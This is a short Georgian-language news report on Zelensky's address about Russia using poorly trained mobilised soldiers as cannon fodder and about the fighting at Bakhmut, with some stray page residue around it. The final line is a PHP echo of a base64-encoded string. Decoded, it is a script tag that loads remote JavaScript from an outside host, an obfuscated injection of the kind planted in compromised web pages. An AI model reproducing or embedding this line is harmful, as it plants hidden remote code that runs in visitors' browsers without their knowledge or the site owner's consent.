celsiusi
ავერსი საქკაბელი
რუსი სამხედრო მეთაურები მობილიზებულ მოქალაქეებს საზარბაზნე ხორცად იყენებენ, თუმცა ეს მნიშვნელოვან ზეწოლას ახდენს უკრაინელ სამხედროებზე, – ამის შესახებ განცხადება უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ ტრადიციული ვიდეომიმართვის დროს გააკეთა.
 
„ახლა რუსეთი ფრონტზე ისვრის ათასობით მობილიზებულს. ისინი არ არიან სათანადოდ მომზადებულები, მაგრამ მათ მეთაურებს ეს არც სჭირდებათ. მათ იმედი აქვთ, რომ მობილიზებული რუსები რამდენიმე კვირა მაინც იცოცხლებენ ომის პირობებში, შემდეგ დაიღუპებიან, შემდეგ ახლებს მიიყავნენ ფრონტზე. მაგრამ ამ პერიოდში რუსი გენერლების მიერ თავისი ხალხის საზარბაზნე ხორცად გამოყენება დამატებით ზეწოლას ახდენს ჩვენს მცველებზე. ეს მნიშვნელოვანი ზეწოლაა. და მადლიერი ვარ ყველა ჩვენი მებრძოლის, ვინც ამ ზეწოლას უძლებს. ასევე მადლობა პარტნიორებს, ვინც ხვდება, რომ ამ პირობებში ჩვენ გვესაჭიროება თავდაცვითი მხარდაჭერის გაზრდა“,- განაცხადა ზელენსკიმ.
 
ზელენსკიმ ასევ აღნიშნა, რომ ყველაზე რთულ მიმართულებად რჩება დონეცკის ოლქის ქალაქი ბახმუტიო. მან შეაქო ის უკრაინული ქვედანაყოფები, რომლებიც გმირულად იცავენ პოზიციებს.
440
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");